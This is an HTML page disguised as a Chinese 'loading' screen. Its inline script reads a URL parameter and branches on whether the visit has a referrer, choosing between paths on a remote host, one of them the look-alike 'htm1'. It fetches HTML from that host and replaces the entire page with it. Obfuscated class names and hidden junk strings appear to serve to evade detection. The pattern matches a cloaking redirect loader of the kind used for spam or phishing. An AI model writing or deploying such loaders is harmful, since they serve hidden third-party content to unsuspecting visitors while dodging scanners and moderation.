<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .v0p0NdlqQ {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .v0p0NdlqQ .RaaLjwIfLyT {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .v0p0NdlqQ .content {
            line-height: 50px;
            text-align: center
        }

        .v0p0NdlqQ .img {
            width: 100%
        }

        .v0p0NdlqQ .go4IjGKgs {
            text-align: center
        }

        .v0p0NdlqQ .go4IjGKgs span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .v0p0NdlqQ .go4IjGKgs span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .v0p0NdlqQ .go4IjGKgs span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .v0p0NdlqQ .go4IjGKgs span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .v0p0NdlqQ .go4IjGKgs span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .v0p0NdlqQ .go4IjGKgs span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .v0p0NdlqQ .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function ubbw7VVHOxH(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var aLGCvC = ubbw7VVHOxH('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ aLGCvC +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ aLGCvC +".html?a=share";
		}
		
        ssFBM8POO=url+"#"+new Date().getTime();
        ssFBM8POO && function() {
            $.get(ssFBM8POO, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<div style='display:none'>jgenP9eAuNlsRB5ZnuMCBmmck8nsRXNJ6i959WyCtyas3hS8ymxkAcOsn9Ab1mbSArD8Y4GoP9Qv1hV6CBxGnPSBS7</div>
<div style='display:none'>jgenP9eAuNlsRB5ZnuMCBmmck8nsRXNJ6i959WyCtyas3hS8ymxkAcOsn9Ab1mbSArD8Y4GoP9Qv1hV6CBxGnPSBS7</div>
<img  src='' style='display:none'>
<img  src='' style='display:none'>
<img  src='' style='display:none'>
<div style='display:none'>jgenP9eAuNlsRB5ZnuMCBmmck8nsRXNJ6i959WyCtyas3hS8ymxkAcOsn9Ab1mbSArD8Y4GoP9Qv1hV6CBxGnPSBS7</div><div class="v0p0NdlqQ">
    <div class="RaaLjwIfLyT">
        <div class="go4IjGKgs">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<ul style='display:none' >xF4XcngCA1VxGEDvwl7FukFjb2hEvJCxxAQrb5djW9DMHJydDc0XxAloemU9Uu0fX8ErWg8kbV</ul>
<ul style='display:none' >xF4XcngCA1VxGEDvwl7FukFjb2hEvJCxxAQrb5djW9DMHJydDc0XxAloemU9Uu0fX8ErWg8kbV</ul>
<div style='display:none'>AR4iaUX5xY3QfgY2DDpTa6ufHv6meMj8T6El88hGcxMJZ2PSWxyZSB5XmBpWWjj68ax6n6ECE2RKPIleDyFT2q93h2FE2sJXHxkp</div>
<li style='display:none' >At3ovTOoKXy0g3050Ry1kqcZ</li>
<img  src='' style='display:none'></body>
</html>